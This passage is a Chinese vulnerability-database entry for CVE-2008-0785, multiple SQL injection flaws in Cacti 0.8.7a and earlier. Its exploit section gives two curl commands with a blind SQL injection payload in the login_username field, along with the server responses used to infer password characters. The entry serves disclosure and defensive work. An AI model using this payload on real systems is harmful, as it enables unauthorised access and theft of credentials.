Cacti 多个SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1114542 漏洞类型 SQL注入
发布时间 2008-02-12 更新时间 2008-09-05
CVE编号 CVE-2008-0785 CNNVD-ID CNNVD-200802-295
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/31161
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200802-295
|漏洞详情
Cacti是Cacti团队的一套开源的网络流量监测和分析工具。该工具通过snmpget来获取数据,使用RRDtool绘画图形进行分析,并提供数据和用户管理功能。Cacti存在多个SQL注入漏洞。远程攻击者可以通过:(1)graph_view.php的graph_list参数;(2)tree.php的leaf_id和id参数;(3)graph_xport.php的local_graph_id参数;(4)index.php的login_username参数执行任意SQL命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/27749/info
     
Cacti is prone to multiple unspecified input-validation vulnerabilities, including:
     
- Multiple cross-site scripting vulnerabilities
- Multiple SQL-injection vulnerabilities
- An HTTP response-splitting vulnerability.
     
Attackers may exploit these vulnerabilities to influence or misrepresent how web content is served, cached, or interpreted, to compromise the application, to access or modify data, to exploit vulnerabilities in the underlying database, or to execute arbitrary script code in the browser of an unsuspecting user.
     
These issues affect Cacti 0.8.7a and prior versions. 

$ curl -kis "http://www.example.com/cacti-0.8.7a/index.php/sql.php" -d \
"login_username=foo'+or+ascii(substring(password,1,1))>56#&action=login" \
| head -n1
HTTP/1.1 200 OK
$ curl -kis "http://www.example.com/cacti-0.8.7a/index.php/sql.php" -d \
"login_username=foo'+or+ascii(substring(password,1,1))<56#&action=login" \
| head -n1
HTTP/1.1 302 Found
|参考资料

来源:BID
名称:27749
链接:http://www.securityfocus.com/bid/27749
来源:www.cacti.net
链接:http://www.cacti.net/release_notes_0_8_7b.php
来源:XF
名称:cacti-datainput-xss(50575)
链接:http://xforce.iss.net/xforce/xfdb/50575
来源:SECTRACK
名称:1019414
链接:http://www.securitytracker.com/id?1019414
来源:BID
名称:34991
链接:http://www.securityfocus.com/bid/34991
来源:BUGTRAQ
名称:20080212Cacti0.8.7aMultipleVulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/488018/100/0/threaded
来源:BUGTRAQ
名称:20080212cacti--Multiplesecurityvulnerabilitieshavebeendiscovered
链接:http://www.securityfocus.com/archive/1/archive/1/488013/100/0/threaded
来源:VUPEN
名称:ADV-2008-0540
链接:http://www.frsirt.com/english/advisories/2008/0540
来源:SECUNIA
名称:28872
链接:http://secunia.com/advisories/28872
来源:bugs.cacti.net
链接:http://bugs.cacti.net/view.php?id=1245
来源:FEDORA
名称:FEDORA-2008-1737
链接:https://www.redhat.com/archives/fedora-package-announce/2008-February/msg00593.html
来源:FEDORA
名称:FEDORA-2008-1699
链接:https://www.redhat.com/archives/fedor